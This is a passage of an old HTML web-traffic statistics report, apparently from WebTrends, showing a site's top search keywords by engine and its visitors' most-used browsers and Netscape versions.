<TR BGCOLOR="#F0F0F0"><TD WIDTH=10% ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">1</TD><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B>forrest</B></TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">110</TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">15.38%</TD></TR>
<TR BGCOLOR="#FFFFFF"><TD WIDTH=10% ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">2</TD><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B>bedford</B></TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">72</TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">10.06%</TD></TR>
<TR BGCOLOR="#F0F0F0"><TD WIDTH=10% ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">3</TD><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B>nathan</B></TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">71</TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">9.93%</TD></TR>
<TR BGCOLOR="#FFFFFF"><TD WIDTH=10% ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">4</TD><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B>of</B></TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">23</TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">3.21%</TD></TR>
<TR BGCOLOR="#F0F0F0"><TD WIDTH=10% ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">5</TD><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B>pictures</B></TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">20</TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">2.79%</TD></TR>
<TR BGCOLOR="#FFFFFF"><TD WIDTH=10% ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">6</TD><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B>the</B></TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">14</TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">1.95%</TD></TR>
<TR BGCOLOR="#F0F0F0"><TD WIDTH=10% ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">7</TD><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B>general</B></TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">13</TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">1.81%</TD></TR>
<TR BGCOLOR="#FFFFFF"><TD WIDTH=10% ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">8</TD><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B>klan</B></TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">11</TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">1.53%</TD></TR>
<TR BGCOLOR="#F0F0F0"><TD WIDTH=10% ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">9</TD><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B>klux</B></TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">11</TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">1.53%</TD></TR>
<TR BGCOLOR="#FFFFFF"><TD WIDTH=10% ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">10</TD><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B>nathaniel</B></TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">10</TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">1.39%</TD></TR>
<TR BGCOLOR="#F0F0F0">
<TD> </TD>
<TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B>Total Found for the Keywords Above</B></TD>
<TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B>355</B></TD>
<TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B>49.65%</B></TD>
</TR>
<TR BGCOLOR="#D0D0D0">
<TD> </TD>
<TD WIDTH=100%><FONT SIZE=3 FACE="Arial" COLOR="#000000"><B>Total of Keywords Found in the Log File</B></TD>
<TD ALIGN="CENTER"><FONT SIZE=3 FACE="Arial" COLOR="#000000"><B>715</B></TD>
<TD ALIGN="CENTER"><FONT SIZE=3 FACE="Arial" COLOR="#000000"><B>100%</B></TD>
</TR>
</TABLE></CENTER>
<!-- WT_CRLF -->
><HR><P>
</BODY>
<BODY BGCOLOR="#FFFFFF" BACKGROUND="">
<P><CENTER><TABLE BORDER=1 CELLSPACING=0 WIDTH=90%>
<TR BGCOLOR="#74C6F6">
<TD COLSPAN=4 ROWSPAN=1 NOWRAP><FONT SIZE=+1 FACE="Arial" COLOR="#000000">
<!-- WT_TABLE_STATS>4, 2, 2, 1
, 1
</WT_TABLE_STATS -->
<CENTER><B>Top Search Keywords with Engines Detail</B></CENTER></TD></TR>
<!-- WT_EXCEL_SHEET_NAME>Top Search Keywords with Engines Detail</WT_EXCEL_SHEET_NAME -->
<TR BGCOLOR="#D0D0D0">
<TD WIDTH=100%><FONT SIZE=3 FACE="Arial" COLOR="#000000"><B><CENTER>Keywords</CENTER></B></TD>
<TD WIDTH=100%><FONT SIZE=3 FACE="Arial" COLOR="#000000"><B><CENTER>Engines</CENTER></B></TD>
<TD WIDTH=12%><FONT SIZE=3 FACE="Arial" COLOR="#000000"><CENTER><B>Searches</B></CENTER></TD>
<TD WIDTH=12%><FONT SIZE=3 FACE="Arial" COLOR="#000000"><CENTER><B>% of Total</B></CENTER></TD>
</TR>
<TR BGCOLOR="#F0F0F0"><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B>forrest </B></TD><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000">Yahoo </TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">82</TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">11.46%</TD></TR>
<TR BGCOLOR="#F0F0F0"><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B> </B></TD><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000">Lycos </TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">20</TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">2.79%</TD></TR>
<TR BGCOLOR="#F0F0F0"><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B> </B></TD><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000">Excite </TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">4</TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">0.55%</TD></TR>
<TR BGCOLOR="#F0F0F0"><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B> </B></TD><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000">AltaVista </TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">4</TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">0.55%</TD></TR>
<TR BGCOLOR="#FFFFFF"><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B>bedford </B></TD><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000">Yahoo </TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">58</TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">8.11%</TD></TR>
<TR BGCOLOR="#FFFFFF"><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B> </B></TD><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000">Lycos </TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">13</TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">1.81%</TD></TR>
<TR BGCOLOR="#FFFFFF"><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B> </B></TD><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000">AltaVista </TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">1</TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">0.13%</TD></TR>
<TR BGCOLOR="#F0F0F0"><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B>nathan </B></TD><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000">Yahoo </TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">55</TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">7.69%</TD></TR>
<TR BGCOLOR="#F0F0F0"><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B> </B></TD><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000">Lycos </TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">15</TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">2.09%</TD></TR>
<TR BGCOLOR="#F0F0F0"><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B> </B></TD><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000">AltaVista </TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">1</TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">0.13%</TD></TR>
<TR BGCOLOR="#FFFFFF"><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B>of </B></TD><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000">Yahoo </TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">21</TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">2.93%</TD></TR>
<TR BGCOLOR="#FFFFFF"><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B> </B></TD><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000">Lycos </TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">1</TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">0.13%</TD></TR>
<TR BGCOLOR="#FFFFFF"><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B> </B></TD><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000">AltaVista </TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">1</TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">0.13%</TD></TR>
<TR BGCOLOR="#F0F0F0"><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B>pictures </B></TD><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000">Yahoo </TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">14</TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">1.95%</TD></TR>
<TR BGCOLOR="#F0F0F0"><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B> </B></TD><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000">Excite </TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">3</TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">0.41%</TD></TR>
<TR BGCOLOR="#F0F0F0"><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B> </B></TD><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000">Lycos </TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">2</TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">0.27%</TD></TR>
<TR BGCOLOR="#F0F0F0"><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B> </B></TD><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000">AltaVista </TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">1</TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">0.13%</TD></TR>
<TR BGCOLOR="#FFFFFF"><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B>the </B></TD><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000">Yahoo </TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">13</TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">1.81%</TD></TR>
<TR BGCOLOR="#FFFFFF"><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B> </B></TD><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000">Lycos </TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">1</TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">0.13%</TD></TR>
<TR BGCOLOR="#F0F0F0"><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B>general </B></TD><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000">Yahoo </TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">9</TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">1.25%</TD></TR>
<TR BGCOLOR="#F0F0F0"><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B> </B></TD><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000">Lycos </TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">4</TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">0.55%</TD></TR>
<TR BGCOLOR="#FFFFFF"><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B>klan </B></TD><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000">Yahoo </TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">11</TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">1.53%</TD></TR>
<TR BGCOLOR="#F0F0F0"><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B>klux </B></TD><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000">Yahoo </TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">11</TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">1.53%</TD></TR>
<TR BGCOLOR="#FFFFFF"><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B>nathaniel </B></TD><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000">Yahoo </TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">10</TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">1.39%</TD></TR>
</TABLE></CENTER>
<!-- WT_CRLF -->
<!-- WT_PAGEBREAK -->
><HR><P>
</BODY>
<BODY BGCOLOR="#FFFFFF" BACKGROUND="">
<a name="TopBrowsers"><!--Browsers & Platforms::Most Used Browsers--></A>
<!-- WT_H1>Most Used Browsers</WT_H1 -->
<!-- Start Strip -->
<CENTER><TABLE BORDER=0 WIDTH=100%><TR>
<TD ALIGN=LEFT WIDTH=100% BGCOLOR="#0000FF"><FONT SIZE=4 FACE="Arial" COLOR="#FFFFFF"><B>Most Used Browsers</B></FONT></TD>
<TD BGCOLOR="#FFFFFF"><PRE> </PRE></TD>
</TR></TABLE></CENTER>
<!-- End Strip -->
<P>
<!-- WT_CRLF -->
<FONT SIZE=3 FACE="Arial" COLOR="#000000"><!-- WT_DESCRIPTION -->This section identifies the most popular WWW Browsers used by visitors to the site. This information will only be displayed if your server is logging the browser/platform information.<!-- /WT_DESCRIPTION --></FONT>
<!-- WT_CRLF -->
<!-- WT_CRLF -->
<P><CENTER><TABLE BORDER=1 CELLSPACING=0><TR>
<TD><IMG SRC="index20.gif"></TD></TR></TABLE></CENTER><!-- WT_CRLF -->
<P><CENTER><TABLE BORDER=1 CELLSPACING=0 WIDTH=90%>
<TR BGCOLOR="#74C6F6">
<TD COLSPAN=5 ROWSPAN=1 NOWRAP><FONT SIZE=+1 FACE="Arial" COLOR="#000000">
<!-- WT_TABLE_STATS>5, .3, 2.7, 1
, 1
, 1
</WT_TABLE_STATS -->
<CENTER><B>Top Browsers</B></CENTER></TD></TR>
<!-- WT_EXCEL_SHEET_NAME>Most Used Browsers</WT_EXCEL_SHEET_NAME -->
<TR BGCOLOR="#D0D0D0">
<TD WIDTH=5%><B> </B></TD>
<TD WIDTH=100%><FONT SIZE=3 FACE="Arial" COLOR="#000000"><B><CENTER>Browser</CENTER></B></TD>
<TD WIDTH=12%><FONT SIZE=3 FACE="Arial" COLOR="#000000"><CENTER><B>Hits</B></CENTER></TD>
<TD WIDTH=12%><FONT SIZE=3 FACE="Arial" COLOR="#000000"><CENTER><B>% of Total Hits</B></CENTER></TD>
<TD WIDTH=12%><FONT SIZE=3 FACE="Arial" COLOR="#000000"><CENTER><B>User Sessions</B></CENTER></TD>
</TR>
<TR BGCOLOR="#F0F0F0"><TD WIDTH=10% ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">1</TD><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B>Microsoft Internet Explorer</B></TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">46474</TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">73.73%</TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">6622</TD></TR>
<TR BGCOLOR="#FFFFFF"><TD WIDTH=10% ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">2</TD><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B>Netscape</B></TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">7085</TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">11.24%</TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">665</TD></TR>
<TR BGCOLOR="#F0F0F0"><TD WIDTH=10% ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">3</TD><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B>Other Netscape Compatible</B></TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">1701</TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">2.69%</TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">234</TD></TR>
<TR BGCOLOR="#FFFFFF"><TD WIDTH=10% ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">4</TD><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B>Java 1.1</B></TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">1403</TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">2.22%</TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">475</TD></TR>
<TR BGCOLOR="#F0F0F0"><TD WIDTH=10% ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">5</TD><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B>InternetSeer.com</B></TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">1383</TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">2.19%</TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">1379</TD></TR>
<TR BGCOLOR="#FFFFFF"><TD WIDTH=10% ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">6</TD><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B>Java1.1.3</B></TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">780</TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">1.23%</TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">2</TD></TR>
<TR BGCOLOR="#F0F0F0"><TD WIDTH=10% ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">7</TD><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B>FAST-WebCrawler/3.3 (crawler@fast.no; http://fast.no/support.php?c=faqs/crawler)</B></TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">405</TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">0.64%</TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">25</TD></TR>
<TR BGCOLOR="#FFFFFF"><TD WIDTH=10% ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">8</TD><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B>WebTV</B></TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">376</TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">0.59%</TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">93</TD></TR>
<TR BGCOLOR="#F0F0F0"><TD WIDTH=10% ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">9</TD><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B>FAST-WebCrawler/3.2 test</B></TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">331</TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">0.52%</TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">70</TD></TR>
<TR BGCOLOR="#FFFFFF"><TD WIDTH=10% ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">10</TD><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B>Scooter-W3.1.2</B></TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">293</TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">0.46%</TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">212</TD></TR>
<TR BGCOLOR="#D0D0D0">
<TD> </TD>
<TD WIDTH=100%><FONT SIZE=3 FACE="Arial" COLOR="#000000"><B>Total For Browsers Above</B></TD>
<TD ALIGN="CENTER"><FONT SIZE=3 FACE="Arial" COLOR="#000000"><B>60231</B></TD>
<TD ALIGN="CENTER"><FONT SIZE=3 FACE="Arial" COLOR="#000000"><B>95.56%</B></TD>
<TD ALIGN="CENTER"><FONT SIZE=3 FACE="Arial" COLOR="#000000"><B>9777</B></TD>
</TR>
</TABLE></CENTER>
<!-- WT_CRLF -->
<!-- WT_PAGEBREAK -->
><HR><P>
</BODY>
<BODY BGCOLOR="#FFFFFF" BACKGROUND="">
<a name="TopNetscape"><!--Browsers & Platforms::Netscape Browsers--></A>
<!-- WT_H1>Netscape Browsers</WT_H1 -->
<!-- Start Strip -->
<CENTER><TABLE BORDER=0 WIDTH=100%><TR>
<TD ALIGN=LEFT WIDTH=100% BGCOLOR="#0000FF"><FONT SIZE=4 FACE="Arial" COLOR="#FFFFFF"><B>Netscape Browsers</B></FONT></TD>
<TD BGCOLOR="#FFFFFF"><PRE> </PRE></TD>
</TR></TABLE></CENTER>
<!-- End Strip -->
<P>
<!-- WT_CRLF -->
<FONT SIZE=3 FACE="Arial" COLOR="#000000"><!-- WT_DESCRIPTION -->This section gives you a breakdown of the various versions of Netscape browsers that visitors to the site are using.<!-- /WT_DESCRIPTION --></FONT>
<!-- WT_CRLF -->
<!-- WT_CRLF -->
<P><CENTER><TABLE BORDER=1 CELLSPACING=0><TR>
<TD><IMG SRC="index21.gif"></TD></TR></TABLE></CENTER><!-- WT_CRLF -->
<P><CENTER><TABLE BORDER=1 CELLSPACING=0 WIDTH=90%>
<TR BGCOLOR="#74C6F6">
<TD COLSPAN=5 ROWSPAN=1 NOWRAP><FONT SIZE=+1 FACE="Arial" COLOR="#000000">
<!-- WT_TABLE_STATS>5, .3, 2.7, 1
, 1
, 1
</WT_TABLE_STATS -->
<CENTER><B>Netscape Browsers</B></CENTER></TD></TR>
<!-- WT_EXCEL_SHEET_NAME>Netscape Browsers</WT_EXCEL_SHEET_NAME -->
<TR BGCOLOR="#D0D0D0">
<TD WIDTH=5%><B> </B></TD>
<TD WIDTH=100%><FONT SIZE=3 FACE="Arial" COLOR="#000000"><B><CENTER>Browser</CENTER></B></TD>
<TD WIDTH=12%><FONT SIZE=3 FACE="Arial" COLOR="#000000"><CENTER><B>Hits</B></CENTER></TD>
<TD WIDTH=12%><FONT SIZE=3 FACE="Arial" COLOR="#000000"><CENTER><B>% of Total Hits</B></CENTER></TD>
<TD WIDTH=12%><FONT SIZE=3 FACE="Arial" COLOR="#000000"><CENTER><B>User Sessions</B></CENTER></TD>
</TR>
<TR BGCOLOR="#F0F0F0"><TD WIDTH=10% ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">1</TD><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B>Netscape 4.x</B></TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">6072</TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">85.7%</TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">344</TD></TR>
<TR BGCOLOR="#FFFFFF"><TD WIDTH=10% ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">2</TD><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B>Netscape 5.x</B></TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">773</TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">10.91%</TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">223</TD></TR>
<TR BGCOLOR="#F0F0F0"><TD WIDTH=10% ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">3</TD><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B>Netscape 3.x</B></TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">234</TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">3.3%</TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">92</TD></TR>
<TR BGCOLOR="#FFFFFF"><TD WIDTH=10% ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">4</TD><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B>Netscape</B></TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">6</TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">0.08%</TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">6</TD></TR>
<TR BGCOLOR="#D0D0D0">
<TD> </TD>
<TD WIDTH=100%><FONT SIZE=3 FACE="Arial" COLOR="#000000"><B>Total For Browsers Above</B></TD>
<TD ALIGN="CENTER"><FONT SIZE=3 FACE="Arial" COLOR="#000000"><B>7085</B></TD>
<TD ALIGN="CENTER"><FONT SIZE=3 FACE="Arial" COLOR="#000000"><B>100%</B></TD>
<TD ALIGN="CENTER"><FONT SIZE=3 FACE="Arial" COLOR="#000000"><B>665</B></TD>
</TR>
</TABLE></CENTER>
<!-- WT_CRLF -->
<!-- WT_PAGEBREAK -->
><HR><P>
</BODY>
<BODY BGCOLOR="#FFFFFF" BACKGROUND="">
<a name="TopExplorer"><!--Browsers & Platforms::Microsoft Explorer Browsers--></A>
<!-- WT_H1>Microsoft Explorer Browsers</WT_H1 -->
<!-- Start Strip -->
<CENTER><TABLE BORDER=0 WIDTH=100%><TR>
<TD ALIGN=LEFT WIDTH=100% BGCOLOR="#0000FF"><FONT SIZE=4 FACE="Arial" COLOR="#FFFFFF"><B>Microsoft Explorer Browsers</B></FONT></TD>
<TD BGCOLOR="#FFFFFF"><PRE> </PRE></TD>
</TR></TABLE></CENTER>
<!-- End Strip -->
<P>
<!-- WT_CRLF -->
<FONT SIZE=3 FACE="Arial" COLOR="#000000"><!-- WT_DESCRIPTION -->This section gives you a breakdown of the various versions of Microsoft Explorer browsers that visitors to the site are using.<!-- /WT_DESCRIPTION --></FONT>
<!-- WT_CRLF -->
<!-- WT_CRLF -->
<P><CENTER><TABLE BORDER=1 CELLSPACING=0><TR>
